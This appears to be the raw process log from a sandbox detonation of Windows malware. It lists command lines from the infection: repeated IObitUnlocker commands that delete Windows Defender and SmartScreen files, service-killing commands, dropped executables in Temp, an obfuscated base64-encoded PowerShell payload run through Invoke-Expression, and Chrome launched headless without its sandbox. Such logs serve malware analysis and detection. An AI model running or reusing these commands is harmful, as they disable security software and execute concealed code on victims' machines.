Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker

C:\Windows\system32\sc.exe

sc stop IObitUnlocker

C:\Windows\system32\sc.exe

sc delete IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid "2112"

C:\Windows\system32\taskkill.exe

taskkill /f /pid "2112"

C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe

Unlocker /newDiskSize

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker

C:\Windows\system32\sc.exe

sc query IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker

C:\Windows\system32\sc.exe

sc stop IObitUnlocker

C:\Windows\system32\sc.exe

sc delete IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid "6480"

C:\Windows\system32\taskkill.exe

taskkill /f /pid "6480"

C:\Windows\SysWOW64\sc.exe

sc start VMTools

C:\Windows\SysWOW64\sc.exe

sc start VMTools

C:\Users\Admin\AppData\Local\Temp\is-77AKN.tmp\Tu_Inspector32.exe

"C:\Users\Admin\AppData\Local\Temp\is-77AKN.tmp\Tu_Inspector32.exe"

C:\ProgramData\Patchfm\Tu_Inspector32.exe

C:\ProgramData\Patchfm\Tu_Inspector32.exe

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe

C:\Users\Admin\AppData\Local\Temp\10525000101\v999f8.exe

"C:\Users\Admin\AppData\Local\Temp\10525000101\v999f8.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe

"C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "JAB7ADAAeAAxAGEAMgBiADMAYwB9AD0AWwBTAHkAcwB0AGUAbQAuAFIAYQBuAGQAbwBtAF0AOgA6AG4AZQB3ACgAKQA7ACQAewAwAHgANABkADUAZQA2AGYAfQA9ACYAKABbAGMAaABhAHIAWwBdAF0AKAA3ADEALAAxADAAMQAsADEAMQA2ACwANAA1ACwANgA4ACwAOQA3ACwAMQAxADYALAAxADAAMQApAC0AagBvAGkAbgAnACcAKQA6ADoAbgBlAHcAKAApADsAJAB7ADAAeAA3AGcAOABoADkAaQB9AD0AJABuAHUAbABsADsAJAB7ADAAeABqADAAawAxAGwAMgB9AD0AQAAoACkAOwAkAHsAMAB4AG0AMwBuADQAbwA1AH0APQAoAFsAYwBoAGEAcgBbAF0AXQAoADEAMQAxACwAOQA4ACwAOQA5ACwAOQA3ACwAMQAxADYALAAxADAANQAsADEAMQAxACwAMQAxADAAKQAtAGoAbwBpAG4AJwAnACkAOwAkAHsAMAB4AHAANgBxADcAcgA4AH0APQAxAC4ALgAxADAAfAAmACgAWwBjAGgAYQByAFsAXQBdACgANwAwACwAMQAxADEALAAxADEANAAsADYAOQAsADkANwAsADkAOQAsADEAMAA0ACwANAA1ACwANwA5ACwAOQA4ACwAMQAwADYALAAxADAAMQAsADkAOQAsADEAMQA2ACkALQBqAG8AaQBuACcAJwApAHsAJAB7ADAAeAAxAGEAMgBiADMAYwB9AC4ATgBlAHgAdAAoACkAfQA7ACQAewAwAHgAcwA5AHQAMAB1ADEAfQA9ACYAKABbAGMAaABhAHIAWwBdAF0AKAA3ADEALAAxADAAMQAsADEAMQA2ACwANAA1ACwAOAAwACwAMQAxADQALAAxADEAMQAsADkAOQAsADEAMAAxACwAMQAxADUALAAxADEANQApAC0AagBvAGkAbgAnACcAKQB8ACYAKABbAGMAaABhAHIAWwBdAF0AKAA4ADMALAAxADAAMQAsADEAMAA4ACwAMQAwADEALAA5ADkALAAxADEANgAsADQANQAsADcAOQAsADkAOAAsADEAMAA2ACwAMQAwADEALAA5ADkALAAxADEANgApAC0AagBvAGkAbgAnACcAKQAtAEYAaQByAHMAdAAgADMAOwAkAHsAMAB4AHYAMgB3ADMAeAA0AH0APQBbAFMAeQBzAHQAZQBtAC4ARwBDAF0AOgA6AEcAZQB0AFQAbwB0AGEAbABNAGUAbQBvAHIAeQAoACQAZgBhAGwAcwBlACkAOwAkAHsAMAB4AHkANQB6ADYAYQA3AH0APQAoAFsAYwBoAGEAcgBbAF0AXQAoADEAMAA5ACwAMQAxADEALAAxADEANAAsADEAMAAxACwAMQAwADYALAAxADEANwAsADEAMQAwACwAMQAwADcAKQAtAGoAbwBpAG4AJwAnACkAOwAkAHsAMAB4AGIAOABjADkAZAAwAGUAMQB9AD0AQAB7AGYAYQBrAGUAPQAnAGQAYQB0AGEAJwA7AG0AbwByAGUAPQAnAHMAdAB1AGYAZgAnAH0AOwAkAGEAPQA0ADMANgA7ACQAYgA9ACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAB0AG0AcAAxADkAOQBFAC4AdABtAHAAJwA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAoAG4ARQB3AC0AbwBCAGoARQBDAFQAIABzAHkAcwB0AEUAbQAuAEkAbwAuAEMAbwBtAFAAUgBFAFMAcwBJAE8AbgAuAEQARQBmAGwAYQBUAGUAcwBUAFIARQBhAE0AKABbAGkATwAuAG0AZQBNAE8AUgB5AHMAdABSAEUAYQBNAF0AWwBjAE8AbgB2AEUAcgB0AF0AOgA6AGYAcgBvAE0AQgBBAFMARQA2ADQAcwB0AHIAaQBuAEcAKAAnAHIAVgBYAGYAYgA5AG8AdwBFAEgANwBQAFgAKwBFAHgASABoAEwASgBvAEEAegBRAGYAaABSAEYASwBnADMAdABWAHEAbgBUAE8AbQBCAGIAVgA4AFMARABTAFEANABTAHoAYgBFAGoAeAA0AEcAdwB3AHYAOAArAEoAegBFAHQAYQBiAE8AcABWAFAATQBEAHYAbwB0ADkAOQA5ADMASABkAHkAZQAvAFIAagA5AFgAcQA2ACsATABXACsAcQB2AFAAcgB3AHoAbQBvAGsAawBRAGsANwBDAEMASgBDAEQAUABvAEoAcwBEAFkAawBFAHcAKwBmAG8AegBrAEIAcQBOAGIAMQBVAEMARwBCAFAATABoAFIAbgBRAEUAbQBjAGcASwArACsAbQA1AFYANwBMAGYAUwBRADEAVwBwAFAAdQBDAFIAMABEAEIANQBuAGYAbQBMAHMAMABEAG8ASQBLAGEAaQBBAGYAWABDAEwAUwB0AFMAMQBEAEcAUABnACsANgAzAEoASgBsAGIAUgArAGUAOABRAEYAaQBFAEwAWgBjAGcAWgBPAG0AMABZAGEAUgBLAHkASgBSAHAAdgBFAGcAbABSAC8AOQBCAHAAagAxAEkAbQBGAFUAcgA3AGsAawBrAFEAUABCADYARABXAEkAVQBlAEoASAAwAGoAVAB1AGMAMAA5AEoAQgBIAFMAWgBLAGcAbQA1AEsATQBLAGkARwBSAEsAQQAyAFoAUgBBAFAASAB6AG0AegBiADcAdQBDAHoAMwBPAGoAWgBOAG4AYgBMAEwAKwAvAHgAcwBEAEEANgBOAGoANAB2AGoARABkADIAdgB3AGkAZQBEAGkAbQA5AGoARwBJAHUAcABOAG4ANABCAFkASQBCADcAWABZAGEAMQBrAHcAUgBsAFEAbwBIAE0AbwBYAFAAawBDAHIAagBXAGcAcgAwAEoAUQBaADIATABiAGcAcQBKAEQARQBMAHUAQQB6AFAATwBhAGQAbwBnAHcAdgB2AHQAMwBWAEUAeQBpAEwAUQBwAFQAeQBCAFQANABUADUARgBFAHkATgBrAFYAbgBIADEALwBVADkARgBEAEkAbABkAEUAQQBwADkAOAA2AHoAKwAwAHgAWQBHAC8AdgB5AHkAbwAyAFUAMgAvAHoAbwBZAG4AKwBJAFUASQBLAG0ALwB4AGsAaQBMAGoAWQAxAFMAUABPAE4AaABPAG4AcwBBAFkAdQBuAFcAcABuAGoAOABUAFEAcgBoAFMAagBCAGsANwBXADgAdgBtAG4AcgBmADgAQgBkADAARABRAEoATABsAFUAbgBpAGQAVABMAEcAOQBRAGwAWABnAEQALwB3AG4AeQBCAFUASwA0AEEATgBXAFUAagA5AGUAZABKAG0AQQBUAEsAOABmADgAdQBsAHYAYgBKADMAcABpAFgAQgA5ADcAZQA5AHoAVwArAG4AZwBpAE4AVgAxAEEAWgBsAGQAMABaADcAOQBYAHcAcgBYAEoAUQA4AHEAVwBqAEEAKwBlAHcAbQBRAGYAYgBzADYAMgA3AEgAVwA3AFAAOABZAEwAUQBCAEgAQwBzAGMAKwBjAHIAWABKAGkAQgA0ADUAUgBoADcAVgBzADEAagBaAFkAQQBtAFMAcABPAHgAZABYACsANAA4AFMAUgA4ADYAZwBiAEEAMwB3AFEAaQA0AHYASwBMAEwAOQA5AEIAVwB3AHAAQQAyAHgAbgBYAFQAVwBjAFcAegB2AHIAcQBFADEANQBQAGIAdQBLAEgARgBXAFIANwB3ADQASABKAHIARAA2AGwAVQBwADIAOQA0AEUARgBlADkANQBYADgAYQArAGUATgBGAEcAQQBJADIAeABxAEQAUQAvAHIANgBOAGwARgA4ADMARAByAEsASgBCADEAQQBWAEkAegBHAFQAbQBNAC8ANQBoAHQARAByAEIAKwBOAGsAQwBlAHUAYgA0AHAAYQB6AGsAOABPADYAOABXAFMAagBvADEAMwBWAGcAVgB5ADEAWQA0AFYAZgA5AFEAagBJAHAAUQA4AGsAVgBDADEAZAA5AFMAWgBIAFYAZgA3AFkAeQBkADAAVABoAEYAcgBTAHYAQwBsAGkAbABaAEEAbgBMAEgAQQBSAEcAeAAwAGYAUwBkAHEAYwB2AFoAQwBvAFMAYwBuAFoAeABjAEMAQgA2AGQAawBRAFQAZQA5AHMAWgBTAHEARQBmAEUATgBQAFAAMwBUAEoAMQBMADkAWABLAGgAMQBvAGkAcwBVAFgATgB1AFcAYwBiADAAUgBsADAAZQBtAGQATgBjAGwARwA1AG4AMQBpAFMANAA2AFYAdAAvAEEAQQA9AD0AJwApACwAWwBzAHkAUwBUAGUATQAuAEkAbwAuAEMATwBtAFAAcgBlAFMAcwBpAE8ATgAuAGMATwBtAHAAcgBlAFMAUwBpAE8ATgBNAG8AZABlAF0AOgA6AGQARQBDAG8AbQBwAHIAZQBTAFMAKQB8ACUAewBuAEUAdwAtAG8AQgBqAEUAQwBUACAASQBPAC4AcwB0AFIAZQBhAG0AcgBlAGEAZABFAFIAKAAkAF8ALABbAFMAWQBTAFQAZQBtAC4AVABlAHgAdAAuAGUAbgBjAG8ARABpAE4ARwBdADoAOgBBAHMAYwBpAEkAKQB9AHwAJQB7ACQAXwAuAFIAZQBhAEQAVABPAGUATgBkACgAKQB9ACkAIAA=

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff4db5dcf8,0x7fff4db5dd04,0x7fff4db5dd10

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1972,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=1968 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2080,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=2148 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2344,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=2436 /prefetch:8

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=3204 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4228,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=4244 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3184,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=4616 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\SynapseR86.exe

C:\Users\Admin\AppData\Local\Temp\SynapseR86.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4624,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=5128 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10525020101\08IyOOF.exe

"C:\Users\Admin\AppData\Local\Temp\10525020101\08IyOOF.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5420,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=5436 /prefetch:8

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vfmetqxa\vfmetqxa.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES297C.tmp" "c:\Users\Admin\AppData\Local\Temp\vfmetqxa\CSC23D244AA43924E9784369A406BCAE2A8.TMP"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5224,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5584,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=5460 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5176,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=5248 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5204,i,15118449052301296961,13247506164533060456,262144 --variations-seed-version=20250610-050053.594000 --mojo-platform-channel-handle=5600 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff4db5dcf8,0x7fff4db5dd04,0x7fff4db5dd10

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --string-annotations --user-data-dir="C:\Users\Admin\AppData\Local\Temp\0b2iq0et.4gr" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1668,i,8946347859565996325,877113634498623337,262144 --variations-seed-version --mojo-platform-channel-handle=1660 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

